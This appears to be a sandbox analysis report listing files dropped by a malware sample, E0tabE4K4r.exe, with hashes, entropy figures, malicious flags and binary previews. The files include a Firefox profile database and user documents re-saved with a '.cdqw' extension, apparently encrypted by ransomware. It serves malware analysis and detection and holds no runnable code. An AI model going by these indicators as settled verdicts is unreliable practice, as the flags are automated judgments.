                                                                                                                                                  C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):614734
                                                                                                                                                  Entropy (8bit):5.6837353984627965
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:6144:j4qapjHYwXs24BEBBxwnXEwCr2nhtk3QuHCEMaNF7fJ/o7E:EZsw82oEBBwXEwCKnhMQ7aNZBgE
                                                                                                                                                  MD5:99226D6A2461E230F520098D9B751825
                                                                                                                                                  SHA1:AEC2BA127E85C4974EE38D2461B29868D7B11C91
                                                                                                                                                  SHA-256:FA1A8D8BF1AE7607F855133BE252687F7418FBC3DBAE2205478DEB9B9C2EE76E
                                                                                                                                                  SHA-512:BA8F7C56517DB83CB6504664E163E6100249BE292BBBF1FE56C91B692C0629F611EB1B86316E5302D32AE304A591D8E1BF9CFBA2868A761777E5EB736B719D73
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:SQLital...W.Q.k...8..hqD...4..ro..+...v.Gm...W......'r........rZ.b..!.0..|a..U.s.p...^b....\.2..4,..;....T.u#.7......X6..W.OzJ3.t..B..W...7~-~,..X.8.<..k.yP.!.J.Az...7.?..]..I5f....7......I..S.d~.\.$o....{.Rp.3..G.'.......W.P.Q..F~.[..}.}-.Y"."0...$...rEB.SH;...).a....().p.M...O...V..Iz^....Pd.Y..-....{C.lDR........._.w.,.7......V..$..........k..0N.waW.9c).9T...Y..#.....2......c.wgK..<6.....i...|*..R@.r.....:m..(.-e?.o...5.......S.Z0"..S....k...H...".+....)......9.T;^tYO.}$;!...Pk...........+....U.HG.)1^.....M..X^.M..).Z\..T...1L..~...\...Vu..@.$..E..N....O.%...H9...=..6..:...G....N.m..<.D.@k=....p....n.E?k..2>...:.."...t..L...z.5@.....%.^.\0k...I.....N. Q}*Y|..../.F.vg.F^.h..`.K..\ $.7..@.y...K.TQ...hRV.&<c..B7..-@.!..{....>...J..s..`...t......KO..})B..i..(..#~..[....8.~B.X.}......x...;.....\.a{Hs..Uu..,......+....v..]].i..M......p...n..q.eg..........._E...o.......p.b....&....E..G~....M.I?.....".%...z..+.51.|...G....Y....3.w3..n.C.^4&.

                                                                                                                                                  C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shm

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):33102
                                                                                                                                                  Entropy (8bit):7.995007441908094
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:768:p8HMxBV55YUg8zwkcR5SVNnjJbUvZF1DzyOGWCLH:p8HABqUgdRRMNjVUvZFRwWCLH
                                                                                                                                                  MD5:A22E7C174921E0419F35DF29990FB1BA
                                                                                                                                                  SHA1:5E9531BB6544DABEE244B9DED91E69D0F882AA8D
                                                                                                                                                  SHA-256:AC83EC42155CA8998D3BE1E13E12D710EEEE5B1EC106381BAAE6F3610571714F
                                                                                                                                                  SHA-512:019A279AD3E3D7A8215808BA25957B0A4F85B04F0486CC7C0787B6A9763E712D4AF0284058F0310309F3FD444EDF0EA264363384A81E6D588ABD04D466CF429A
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:..-..!Q..\..+..i._....*4........f/.2..,Z...sxi...>$..`!.|.sH/..E...m.9.$...n...j.Eq..&!}eh....9.)......\d...B;9.:...Kg..a..K6...|e(4....W.....B....m.y"..U.O+...G.cc.|......G.&..VQz"$t7c"}.<.>..zJ.r.V...n..M...v...^.N...P...%_...5....A.F.+.:>..%|,.}..N=.[a..).T.......N......[....<.V...".|...p,.hE.p.^ez....m..$3..R..'......7..U"....o..r>..2.v....Wn'F~>:.QJ..q#...qA&...5^........:.7f....3q.xW.565+I(T...VC..0..4..R.t-......Q.$...wg.1.+.*x..pH......Z.....p.bO+j.7O.`..#..Nb`.?..$....~..2....C.>%._Q.R.,...U.*#x..3!_....L...i..).......U.....?...&A-0A..|........R..i.....ld!..?c..q.~.7.|......!..-i..2.m\..8...|.=.....cek.p...A....^T.n.5...C.{...i`[bs)...^....A..\.$i.....o.+45...........g;..].J....0....W...r............?..sp.b...l...!...<..^t(..N..q....B.|Y.......q.:;.!...Drx..c-...Fh+O......Y..|.^....(../l.y..!...;a....n@..|......A...I8H..o..Q....7bH-1/..W.%......W...B(...X.h..."6u.f..)TF.zDt.}F-.7.P....Jw.*?..i..N.........Y...>.#.......?.e...

                                                                                                                                                  C:\Users\user\Application Data\Adobe\Acrobat\DC\TMDocs.sav.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):370
                                                                                                                                                  Entropy (8bit):7.21754901338213
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:6:dEv9nHtpWEwV/Cp0Gcc6kc2Bxo23RPNH7OnBbsrKWfGQzKKylnIS1WdNcii96Z:iFHjLwVOpcVkzs2TH+BbseWeizyWSUdV
                                                                                                                                                  MD5:25806C7375C8AFD9DD011205A1CB1DD2
                                                                                                                                                  SHA1:55C50C9072257A5423592B36D4A3DF8A9944A289
                                                                                                                                                  SHA-256:5828B4396118159DD648401267C0647A5CF08F376B77EC700B74974F57222A02
                                                                                                                                                  SHA-512:37EC0008C105FCB49FD2C2FBFF2C7953E8DED483E3F3D12799B494988C428145F6167AABD27E1AAC0ACBF58AEB093DB6BACA4A8346D610DE35FCF800622B9736
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:%PDFT.>p..f1.u.r.p....l0.}8^\\Y..V....P .*...bE.E...x......h..c...9z.r.O36..@.......Dz..t=....{q..S[sV}....3.`.../.^y..[(..z......6|......rn.6v.'...F..q..UM;..W.Z{...E.7.r....^.p.|o*.X.PcgVR.~...n.J.Dp.y..(9........i].|.>....?Cal".....9.oh^.h.i.}IWr..5.A8l.p.wZo.~....U.q...}f...mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\Application Data\Adobe\Acrobat\DC\TMGrpPrm.sav.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):388
                                                                                                                                                  Entropy (8bit):7.449602325840377
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:nlVvmE4JzdFOoeBcfmpNZukmJagSSUdNcii9a:nlNmEeOoeEOuJh2bD
                                                                                                                                                  MD5:FB7C873A9F174FB00B2D4BDD38AB20DC
                                                                                                                                                  SHA1:02CD7ECDCBE6F10412E125FC0A335589727A99B2
                                                                                                                                                  SHA-256:C2ECE7A20126202B42DB278696A94AF9D5D2E104ED254E82B7BE0A8720C37967
                                                                                                                                                  SHA-512:33C0126BB8D068E398A981D698CDB982CCD77A5949CC85AB6BF964ACBDBB4D46C451D86EBDDD27A499E3569D600CE9056945AAF942EA075AB86222A846BF4669
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:%PDFT..C..g.....H.!&..-..IW..L.A(4>8.j.?....r.Qt.P.K...l.....E=.yN.j....*|..P.l.._L....x.-].._,j.5....m....%fR..p...| FVy.......O..+.....W...t...O.-.cA.|.U[........._....q+.............&`n....\..<....f.....8..,.R..^.t......D|@...!....iyB....R+.F1..`uAg...! .y <......AQ......X <~\..4..O..a[mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\Application Data\Microsoft\Windows\Libraries\CameraRoll.library-ms.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1352
                                                                                                                                                  Entropy (8bit):7.859462875177058
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:FTOBeA9MHih7Upep6j7yRwvgKooWXRyEP6bGF+qFWdVP6FumRO+sdBYdCRmEKMFg:pVOEUx8+Rw0oW0bGa7P6AslbD
                                                                                                                                                  MD5:D820A1EEF488F0AB791DF4FB8F9F9986
                                                                                                                                                  SHA1:25967099E5C7B1E03E01DE0EAECC8BA8ED6474F0
                                                                                                                                                  SHA-256:E141C80A9379E407FE1405F11096317029F64AC3769EDA129E6D1B8867C3BAC8
                                                                                                                                                  SHA-512:7170DD2554890F008EF30CB75EA7D2805A19A50E842289473AC030A1AC729D10D92C878870DA046D5A1965A17CF78CCC0E1AFFDD52C090ED3D29D645C6DC87D0
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xmlX..W..PbD.,.w.%..p.L.0..e.:......K..).m^4....e......$.P3q_@..!7....N..XA....../.K'......u....@..N..!Z...2n.Q..c../......z.,..T.Z.=E....IpF..8......"..g.2......6=.$....Z.B.._...K.K|R.R.*/.r.^.:...x.....,...d..a.0...'.?.S9.4.m...a......=.YW.3..B1.7....u%....V/..k.j.y|..]?".x.vJ.7M.V.p[...q../....6..hR......u...v...0..O.-~.......oZ3....SoD%...a......`.aV+UZ...r..g.F\.'....1V.A.1....r....s.b.A.....@ .....w....GHg....8...D.s8......".....vN...b....7....;....9...4.....?...tG+....@}...4.}t..D..]ti...0E.d.(.*j.]..x.w'.1.... ..y...SiJ....v.n.M...[,..j...."n..u............Q.......8.F..H.H.U........x-{..G.g....P.h.^A...,.'B.$KC.}JDd....?.D.#.s..U...~.y..>..U....K...G.j...dz...^_..@.!M...< 2j.l<...AC.."...L.!......]n#V.WXb..I..~....a`'t..I....].O..R...dI..Td[.C...&.7.7..........s.._({.m.8.d.....w..a.a.......k..Q.v.[.O.z..I....<E|.u,mXR3Z.6...>..0.l..,.+\. Z.U.Z..'d.t.2...\..8..VE.|fw9.lX....B.&y.....g.a.P..nZI52..7..D..W.h...|...u.....{0Yx.e~m:.....a.

                                                                                                                                                  C:\Users\user\Application Data\Microsoft\Windows\Libraries\Documents.library-ms.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2424
                                                                                                                                                  Entropy (8bit):7.934926436421264
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:ylezB8D7t4LKkCNEFCYrR3wwqj3FcMLGJc9mYBBY8kPlAyltPhYtUyD:88B8/kKkCSF5rR3wwmXWcmYBBY8kPlAn
                                                                                                                                                  MD5:07764436B553AC3503B38CEF7E90C866
                                                                                                                                                  SHA1:01ED0F4E9BD6DB97C39FEA74250146D4F7C6185F
                                                                                                                                                  SHA-256:0442AA31F704B6A56C3AB7FFB400F417941C7084025CD744D106624A19A4C86C
                                                                                                                                                  SHA-512:888E6AE460AC903BEC5AEA6281F137355BCEB7225B10B0DFB6BE2B44E6620C647BCD985A473BC112B2C8185E21EEBBF2C182D798013B767DDB146A939B5E4F54
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xmlE..{,S.........4T^.o.jFyjJ.W.........Fa..u..3..............h...p..G....4..%..*...*..)oU...[4.-.....XR...a...M...........]2..KVb\C...6`b.C.J.V6.]A[B...`@.p.....$^Bs...i.5.o.....7.~.O^..O..u3....Xay.../j\.5=f^..y....CW..v.1..c....l....&NuE..w%n(V..#.(]U$.KN.G$..Hv1.GX.C!...hu]B.>.0'.%p..$..9.A..k.!GE.....V/.m)......(.A..r....2....n......2K*...5...2.Z*.4...Z.|{..+.c...C.q]v....s.@.9..........%V.@T.....OjY.......3].i..L..&...Q.....".|+.4.V....s.>..tN......);@k.....n..I..j(.0.i..9../..(..W.x2.r...b...@.`.f.....Q...%..>....\....0......$?`.A....%g..\.6I..........*..V.6..q....../.L..2...........kA$..'.....W..( zun.&..@.@..|.S3..b....6X."....+.MwN.g.J.w..WeSG7Q5.$QuALA.........l../....Ra..5Ed..b.**.].f..]..\1..s!...4.h...|.}.._....eZi...[<}I... .....z...."......].z....(....6o...K:.B.|.n..l..k....4%7[.2M..+..Vte...A6[:.9.>|F..6n.!vw-0...x,.+n..?R.PF(K[.,.J..o.%..a^...ITS..b.w....<...p...C.\v.x.n../...v.p.j..o..%K...B..3.._G...3.}t.=B...|.J.{.`w...

                                                                                                                                                  C:\Users\user\Application Data\Microsoft\Windows\Libraries\Music.library-ms.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2381
                                                                                                                                                  Entropy (8bit):7.914152235795436
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:3aIEUGEzMYHIGg7O0SYFeT/fEVsfJ7sahHoPJhFsfD:3vSEos6/gT/USJPCTFsL
                                                                                                                                                  MD5:0BE796738F5BDCC233A56962E3524623
                                                                                                                                                  SHA1:4A3FBC643A376455EB2C2CE019AC1433D1C79379
                                                                                                                                                  SHA-256:104215722B69744A14F1826A67B7146E12343963CAA40B4A64092FF4D40089DC
                                                                                                                                                  SHA-512:0128CADC2F4DD4099876E5747A290BBBE924DA2E86ACA7DDDE50462DEF07246DD0F4908DB437275F9792AD2F4ED8834E8083D0AB2D4352CA00459C30086C38B9
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml..g....c~.~..~.vS.[o...52.S._.@...V...re@s$.+.p.G....+;../P.9....1q.29.@.O.=....fZ..}X.._...&.9z.T.T..=DM..S.a.x.:..../.i.........m]..S....q.....6`.q..`.P[......r....^...o..M.....-:.qW=.(.fi........8........D.a.../.7a.....@i.{..-..c.tp...R%:.-=..a.:....hw...B\j...D.*-$.`...A.:x^..#.8..............9n|.....)+J.....|.mR:.{..VUT....e..x...(.vS...8.(].%...Q.q..-..j...|.-.. .rHx...g;=>.!#.\..V\.,`.. +).ck...0.u'6...z..h.6aANq.U...&....Umq....{...v.......z...r.......s.omX..7.}N...h..~.99..A@.o.v....u-Y...>.v0b..!JH..ow...)Y|.t....l3S..B..b.^....W..%IT...$.S.P..@.....g.Y_...j`)}...zz/o...vJ.q...f.r,.%O\D`.....`.j.Z...)....k...L.:....F.d.....$....x.~...P..H.o1.X.#.+k...\....Hm.i.6..DW$.M........c....g.mp,.I'..C..:W.s.b)..D..Z.DKwNo....-`.........a.....^4..j..(..........2.i..2hM.(...vr.z.e...9h..f...UH.L.+....UoP.U......It_.Za.#..n..k3.A.....&.....Z....a8..m.6..f..w..*........-{/b.?.r.j..V+.x.[o..L..o~.....n)...(...K......5..

                                                                                                                                                  C:\Users\user\Application Data\Microsoft\Windows\Libraries\Pictures.library-ms.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2398
                                                                                                                                                  Entropy (8bit):7.921826237973104
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:wv2uilXki6euRp4qN+qAbmIEJVJBREslJFSnoaXaHc0At9D:wOuid6rr4DtmIqPS0SnoaqHcFtF
                                                                                                                                                  MD5:0D00C05B3AC6750EA15C43122396BDBD
                                                                                                                                                  SHA1:48D5E5181CD361F02EA84361238DEC787AB75490
                                                                                                                                                  SHA-256:4F20ABA3A036A371FD5CEEE8F83961B3B465F57C4F16A861F59BCF97AF64ABCE
                                                                                                                                                  SHA-512:DDC9010E91C8467A0EE34B855CE2DAA81B7CF959475320CE4506772000F9D1FC727CFAA63ED6601390927B3CF44B85B94620E329855BDD77769AAD94B39B92F1
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.H=.[(.z._....[...F.y.fe...I$O]....C=...ye..Y~..N........s ..X&....a../P...n...\...{p.....zz.9'..4....P%z..u``Ke....m......&......5u...F..Q.I\..N>.O.b^[.n.........v.u.}.#..d.2."8.9...t.lf.Y.~...j.Ss.EB..#...U7.....N;..b.[.`..8s......'.8.1......7mW.........f.."l...L....V.}....}Re.HV....D..M...?A..."O..j..{_...`|.._..O!..........w.....r..4.f...u..A...c9....2D.1=...LB..9.$.?dW..<.....`..........O.5!er.u....6t...@E.6.\..E..bB+...'|...S....c.%h.( n....+.f7...(.P....D...o......vV"6..Nq.OpU..{.{s......V..v...H.+....5@+.F._...[........&<....u(...n,...........DQ...KJ&.a....i@E....=,.,.LM[.pz...D...C..g6.?."........O..-...9.#. ..C@BB.f^..7......$B....=E=.....41..j.k.......+.....(\...v..5....*..YKX4F.a...J9M{.}......h..j...M.Lw.....t..8...n......K.......6..e...R.L..E#5......Q...x..J....W.._...q..KoG.......L..A..E.+../...gzs.#(l.;..a%.i..Zg.Yd-.........q.3U..;/{...<=.\.s?...?..9.W.M.h..Q>S...'..S.4J..q...s.!T.....C.Qj|(.v2...E..U7J..o

                                                                                                                                                  C:\Users\user\Application Data\Microsoft\Windows\Libraries\SavedPictures.library-ms.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1358
                                                                                                                                                  Entropy (8bit):7.867142984668462
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:0Eggipp3AUf5sgXRYXRVixie38CSX2h+mxZ02r3/0h732bD:Uf5sgEriEKUXKWID
                                                                                                                                                  MD5:C37B07B19FF06A9FAF9A631715035507
                                                                                                                                                  SHA1:4E0C9F3BF4DE9B27D1BEF19A7FA61E3437B47F26
                                                                                                                                                  SHA-256:FEFB6D94A59CA6E64BDD8912BEF020066455AF6B84B11A0D17EC24A4381CEA2D
                                                                                                                                                  SHA-512:FF788E3A52E4C827C53BCB26A679D624C067185034543E558163B0E726F68431D7B6F285A0A9B2E7EB53E1595E527979DC4ABD72445A6B0128DF93D4CAD9BC59
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.?V`...[.L....g....c,9.|...NR]...i.*u...._.../.*.......#.s........8...(..sv.x.{....t...D....}..D.......<n.R....A.Q.H.^..?..!.~.d....17B.=d..M:}.....PI.:..d.SY&.N.a..BIF.....z6r......??]..d#.J.pJ."A..>.....3~.<~;H..(c.^u53....C.....b..?.&!t...U"L..Z.M...[..#k .L.$j".....K..7...8...6=..-...{EP[......w.B..Yr...|.<..._;,.......&......$.2h.I....Uv.`....T...h2.......p.}.<.....i.. ....\....>.Fx..kk..>.B.]...^....j.....S..o..q..!o*W.7..e.....rN.'....O3Alp..S..0>...h...&.H0t..jP....d................w.kWe...9.../}K.I....k..C..Cs6B.p......*....t.=....gK[.a..?.B.7.~....9+.\..........zv$\...r....uv.:........k../.....0;\..C.<M_.,p"P..P..$/.2m.S.....Q.sW>].b.../.~Z@^.q.......:7..n.e.s:..-.kWu-........Z.Ev..`.BC...P..o.v...A.Z.U|-.....nY..&....^a..(zYmJ$Dr...t......+.hu14r.2...v..t&.2......F.@..#.h.&s....-......CH..~.......In...v0.yr....7.r.=..F.0w.V.V..S.xg.....eb."3k.w..m....%,~.65.Li..CR._.#~..E=].(H.yN=0..&.(F.[..%@...q.....!A.3PH.5........r!....s

                                                                                                                                                  C:\Users\user\Application Data\Microsoft\Windows\Libraries\Videos.library-ms.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2409
                                                                                                                                                  Entropy (8bit):7.91624554217786
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:SZOJ19T8VWzJ6zhVxTVjaudzLzXzUw9g5YO8MJ1zkm4kofMl03wfD:FT5tihLsmXfMyMJ1om4kofMlBL
                                                                                                                                                  MD5:BDAA6B14F5820A8485AB9196612DB4FB
                                                                                                                                                  SHA1:21E8F8024C2546FA372F97D7792D0DCD35C3CD51
                                                                                                                                                  SHA-256:9B7DF6804F6E7B147F4772A61D992E8246563168823F7231D447981933D29D35
                                                                                                                                                  SHA-512:0E3066A1C530B907020A414F473B76FBA320E33C7F61A0B8613CA44326D354A65452BD46266B0A6B7107EC241ED9AAAA49BE61E12F4295A3748E9E8DFBD4AD5F
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.B...Q.d.E.C#.....b..P.q..y..k.B....O+..{.....nx....'.......XMg.....*.0}...N.f~.u.B=Y^.G....O.....f.U...R<..Jk.....b</.P...MH..dk.....[..dM\ZE..I1x.@..(-.|..2..Wh.bR...p...+..d..Tkq.?.......n..[..-..R.. %."u..q..l.!Y>...4N8.C..x...$?+.......%..H{.Q#|...}......\kv.m.%8....x........dz.a.c...1..>C...%I....v..0.6.{`..i~.C....\.....qw*k.............$.#......D~.....0.-.Zy.X.I......m..l......T.].........`...A.u..K...'..6.1kK?*....A~#....O.,.:.....j'OQ..IH.X.:c..k.....|~B........H..e..E.......g.Q.. j.:O .zn.f....i6{`..P.........Q....H..<i....&p....S#..z..W....[.n..2.x..w..@..b...:...C.=z.V...=....Ff?.-.....).H..Aa.=.YVq...cl..}.Yi_.T@@.7.....4....y&..........,g{].X.cL..E.g.U...$..7....~y...'.*.N.R<+..X<.1.CY.Kv.|[.5.F....?.A,..E.1V..U.....|.;..K{.)%.p.}l.Q...!.b..V.@..q..;.n..;.=.a.q.k.s9..}.xS.PP/..6..&.....E....,.....o...."w...&d.............z..&.>.fu.i6Kv...&...6..M.r...+T..$I.!....g.w.p.ti......&[(.."......ur3...?..Dp.&J<Jo......1...A..(2...

                                                                                                                                                  C:\Users\user\Application Data\Microsoft\Windows\Recent\AIXACVYBSB.png.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.84650189028051
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:yxq8e0vW2ST0+LvUAR44uJjp0CKOfJD7A7kPxwudlFVQNbIhIHVeWD8Dg68o12bD:8NeOSsAV4CCKOfV7A7syUlYZekeU8B8L
                                                                                                                                                  MD5:560AA49F4BE61B6B33252C403BB94595
                                                                                                                                                  SHA1:E3DDABCC26A59178D527370693740BEE82389D41
                                                                                                                                                  SHA-256:DFFA74F2C772B7407B78EAFA95655B1D633E85101F0A4455FF20431B197A8837
                                                                                                                                                  SHA-512:757C99FF86C461C9CF0FBC3BE50BD68E054925E540A2EE3BD0CD5597AD4F5079F432642B4E3E3F4276628FE2957614360EE5499800A62ED33E3E452AD4775A47
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:AIXAC..`.z.X..#..[H..7'.f...(..."....y.5A.G...'{J.;E.7....GN.M...6.?......";A....h....I.S....y.k.iP2Y...,..".t.>...-u...5.CB^&..9w%.........5-b...: ."!C`....T.../....eu.q....k.@..rH....J.....pf.N>.,E.REZ.p......]>..R....,....E=N......u=0..HL.O..]...X.:....+]...Y...5....e.P.Lz..1..U7h=@%...w.=.;.m.....Z....T..C..h.HSosHl..V ..o.!...;:...}.B&.V.t...l\K.Z.R.5.&W.H...(.j)D.sZ..r...-6e..J.L..e./5....<...u&..4.k.......s.v.f7..?#.y<..x....U..V.U"1.{..$.....#.....)K...m..G$.l.yK.t.Q0Q.L.8.%kJAj.laH.|6..J.a+.-.^.D......9...l"J..g..i..l....A{n..P.F8=.g...1...(T..3#.pQ.&6.[...AhE..n.d......`.4hR.nz.e.Q..Ht....MN...+.m.S...F.(...|....P.%|.4......=b..V.H&................0|..t+=...Zy.@.+....F.J..o.q.v.H:.v..e.u8.K........;....wY..........3.<:.S.....!...x..2(.o.........X....'....8h..-<a.3d.......P.O*.*b............;..v%..at.C..2..`...;.MF.._.#...ZqYg3c{.>t.7.....Z.....@z<.c..9..Z....0+~..'....z.G..x..:..#..dA.r.....No.P q.Z..1.},..@....c....O.........\./.....

                                                                                                                                                  C:\Users\user\Application Data\Microsoft\Windows\Recent\CROLFSOWJY.png.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.865600637159202
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:eGm0AMgPJw2U2JdZB6Xe5ekvnXNW4zTHBNV3VQq7D11BPKQ00dZU2bD:en0AMKJw2U7XeTdW4zTHPVCq7vBPKX0P
                                                                                                                                                  MD5:D5BF09F5973ED764D4DC74A4AED2CBEF
                                                                                                                                                  SHA1:D542B3893EA314A7E8ABBB507FC07D84311468BB
                                                                                                                                                  SHA-256:EBB4C352C8B2B16F891A598F990C8B2C16397133C693330276068D7A2C0F4141
                                                                                                                                                  SHA-512:2ECF231CB2390AB473B80614D96EFF0D969220A43C02FF371EC7D5339B2F6577B2EDBDCE83C4A56814CE5A87D44C42050BC5EC122DE7B2B3E4FF2DBF7981B373
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:CROLFvC.....^eR.....3..d5.|fa.q.K.c|.=..N_.q....^..J......#iW........qF...e....m&.5Q.7&I@.?.k.TU.x.J.........'......,^.{.I.W./....|K..>......vz..t.@k...b;..s...q(6m.I......'.s..f[5..o.+....V.7..~...u.bE."..{.........hO.G..E..../.fY.>.z+J.y..).N...9....S..v.2Z..vy.n.1...D..PQ.....JUu.d.\.[...4.....K..Y...........tm.>m.&.....cc.T*..9..T..@..0.".&X..X...t.S......2...T`.D>}.....R6....|.]....j...,......S)U...sH.M8.d..U|..IV......,$Y.......I.4zOq.`G.4.He...-L.. ..{|.......st..p..;+X....a.......FY...4..l.}.N..3.N..{..Hg..).......[.._'A.N.;a..DC9.~..}..l[3$..y9.k.......Y..{.l..[)...D..._.N.RG[r.$..c.S.M6.Z.4..|..=..M.:..q....`...4....]PK.dJ..|.d..hX4}P.....|.U....d.F.q.%. .~.....l.d.F..d.....*#'Q....~N:...........k..S"'......=..'.GcUK.q...j.........]..=.......d.#R&.[...F$.Gv[.F*.7...w..'&........X...?..]....CMF.gI...R./..8...b.i5.J...m3k..Nh.u......HG.t.gO.../."o.E..`...x..3..?...I.....W.. q.#.I'..4...(Px.2....X....v.U..M.&...o..]......)X.{..J...1.

                                                                                                                                                  C:\Users\user\Application Data\Microsoft\Windows\Recent\DTBZGIOOSO.jpg.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.865101086403056
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:4duCim9BOw/j4awFxZPgSTek4lXn7OVJ9u54zXKwBlSGLypd8CJfE2bD:4kwH0awJezhWmGzK8K0CJfXD
                                                                                                                                                  MD5:B2EAE6ED6DD8C189E41EB0DAFC3F144D
                                                                                                                                                  SHA1:B2AB67C3AEB25C2F1595226030DD60816A27F3C0
                                                                                                                                                  SHA-256:2D32BE659AFA4D4C734B81B945034D06E1A61F308BDE7495C8A1FF361604FD28
                                                                                                                                                  SHA-512:A5489802FAB7D80D740B0D2C197E58DF563413B9CC1298276054CA809F10179387A3FAA1CC3E633C3DCF33054FBBA3D903E7C86A6F2FE9790685720C46ECC58A
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:DTBZG...l.+..gl..dq2..S..|.D4..I)..a..VX.a....>Q.N..d.....$../D..1i[Q.P...p.NM{...'........Pv....|...nS}...Cg...I...|..-..+..K....m'.s...9..r...S->...?LQ.t.._......S.N..U....QN5...X.6J.&.&.B*.<w..v!`..w[...2?....'.q{.....xl...P_.T...[..^)(3............G?..&..x.r.os(....Y..... ........-Z...]....8....s......c.Q.Gx.@....fCF=g2F...~...G...M..n->...!Z )i...Y.f....C..w.-...F....x.8...hJ....v7r..K.6....u..Od[.....e...h...Ws.....5;..."E....'..Ju#.n..Q..^.6.+.a...i3d...kJ.8@.j(3.=.........K.j>....k..>nvL.......#ZTe{,.U(.{...u.d...Gj%.f.}.?......D.=..N.1R....m...3..1....SA..9..%.><dl..!.....a....g....O.,.G.hQ51...T..T a@QNB...V.-~..|.q.U:{..^.p..I...A...M2.S..L...K....=...9.J.b..'...M.Q[..\W...d.l@..a.g*'.. ...o.`LZ.vY.#bG^....)..m.a....j....6.[.V1.....p...sXb/...Y.#;.y".C...@Cy..nu.h..wk .....I.^.Q?G3.!f...?......4.C.hb.A..W...*...Ow.+m~.....U.&.........q..1..~....]..Vo.d....'j.9n*nw+.7.>.N$..X..8;.....AI..Gv/.....H.m..|..!.%..H.K.. md5.

                                                                                                                                                  C:\Users\user\Application Data\Microsoft\Windows\Recent\FTCMSGAPZP.mp3.cdqw (copy)

